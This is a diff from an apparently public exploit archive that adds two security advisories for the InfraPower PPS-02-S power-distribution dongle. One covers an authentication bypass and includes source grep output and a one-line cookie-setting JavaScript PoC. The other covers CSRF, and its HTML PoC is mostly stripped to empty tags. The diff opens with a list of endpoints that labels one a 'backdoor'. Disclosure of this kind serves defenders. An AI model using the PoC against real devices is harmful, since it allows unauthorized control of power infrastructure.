/PDUDetails_Ajax_Details.php +GET /PDULog.php +GET /PortSettings.php +GET /production_test1.php ("backdoor") +GET /UploadEXE.php diff --git a/platforms/php/webapps/40645.txt b/platforms/php/webapps/40645.txt new file mode 100755 index 000000000..af27bb43b --- /dev/null +++ b/platforms/php/webapps/40645.txt @@ -0,0 +1,142 @@ +InfraPower PPS-02-S Q213V1 Authentication Bypass Vulnerability + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: The device does not properly perform authentication, allowing +it to be bypassed through cookie manipulation. The vulnerable function +checkLogin() in 'Function.php' checks only if the 'Login' Cookie is empty +or not, allowing easy bypass of the user security mechanisms. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5374 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5374.php + + +27.09.2016 + +-- + + +(example) System.php: +--------------------- +1: init($_SESSION['ite']); +/Users/liwomac/Desktop/infrapower_files/www/Function.php:156: if(empty($_SESSION['Login'])) +/Users/liwomac/Desktop/infrapower_files/www/Function.php:233: if(!isset($_SESSION['TimeSync'])){ +/Users/liwomac/Desktop/infrapower_files/www/Function.php:234: $_SESSION['TimeSync'] = getConf("/mnt/mtd/main_conf", "TimeSyncPDU_opt"); +/Users/liwomac/Desktop/infrapower_files/www/Function.php:235: if($_SESSION['TimeSync'] == "ON"){ +/Users/liwomac/Desktop/infrapower_files/www/Function.php:237: $_SESSION['SyncDate'] = explode(":",$SyncDate); +/Users/liwomac/Desktop/infrapower_files/www/Function.php:239: $_SESSION['TimeSync'] = "OFF"; +/Users/liwomac/Desktop/infrapower_files/www/Function.php:240: $_SESSION['SyncDate'][0] = "0"; +/Users/liwomac/Desktop/infrapower_files/www/Function.php:241: $_SESSION['SyncDate'][1] = "0"; +/Users/liwomac/Desktop/infrapower_files/www/Function.php:255: unset($_SESSION['Login']); +/Users/liwomac/Desktop/infrapower_files/www/Function.php:265: unset($_SESSION['Login']); +/Users/liwomac/Desktop/infrapower_files/www/Login.php:31: $_SESSION['ite'] = substr($this->InfraType,1,1); // e.g."t3v3" get the second chr 3; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:64: $_SESSION['ite'] = "1"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:67: $_SESSION['ite'] = "2"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:70: $_SESSION['ite'] = "3"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:73: $_SESSION['ite'] = "3"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:76: $_SESSION['ite'] = "3"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:79: $_SESSION['ite'] = "4"; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:82: $_SESSION['ite'] = FALSE; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:91:$_SESSION['ite'] = $InfraType; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:137: $_SESSION['Login'] = $_POST['ID_User']; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:140: $_SESSION['Login'] = $_POST['ID_User']; +/Users/liwomac/Desktop/infrapower_files/www/Login.php:156: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") { +/Users/liwomac/Desktop/infrapower_files/www/Login.php:167: if (isset($_SESSION['ite']) && $_SESSION['ite']=="3") { +/Users/liwomac/Desktop/infrapower_files/www/Logout.php:3: $_SESSION['Login']; +/Users/liwomac/Desktop/infrapower_files/www/Logout.php:4: if (isset($_SESSION['Login'])){ +/Users/liwomac/Desktop/infrapower_files/www/Logout.php:5: unset($_SESSION['Login']); +/Users/liwomac/Desktop/infrapower_files/www/Menu.php:60: /*if ($_SESSION["SS_SystemCreated"] == "1") { +/Users/liwomac/Desktop/infrapower_files/www/System.php:52: unset($_SESSION['Login']); +/Users/liwomac/Desktop/infrapower_files/www/System.php:62: unset($_SESSION['Login']); + +➜ www grep -rHn 'checkLogin' /Users/liwomac/Desktop/infrapower_files/www +/Users/liwomac/Desktop/infrapower_files/www/Firmware.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/Function.php:155: function checkLogin(){ +/Users/liwomac/Desktop/infrapower_files/www/FWUpgrade.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/Login.php:165: if(checkLogin()) { +/Users/liwomac/Desktop/infrapower_files/www/OutletDetails.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/OutletDetails_Ajax.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/PDUDetails.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/PDUStatus.php:10: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/PDUStatus_Ajax.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/SensorDetails.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/SensorStatus.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/SNMP.php:4: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/System.php:5: if(!checkLogin()) +/Users/liwomac/Desktop/infrapower_files/www/User.php:4: if(!checkLogin()) + + +PoC: + +javascript:document.cookie="Login=StrangerThings;expires=Sat, 09 Dec 2017 11:05:17 GMT" + +-- diff --git a/platforms/php/webapps/40646.txt b/platforms/php/webapps/40646.txt new file mode 100755 index 000000000..a38ac4923 --- /dev/null +++ b/platforms/php/webapps/40646.txt @@ -0,0 +1,53 @@ +InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with admin +privileges if a logged-in user visits a malicious web site. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5375 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php + + +27.09.2016 + +-- + + +PoC: + + + +
+ + + + + + +
+ +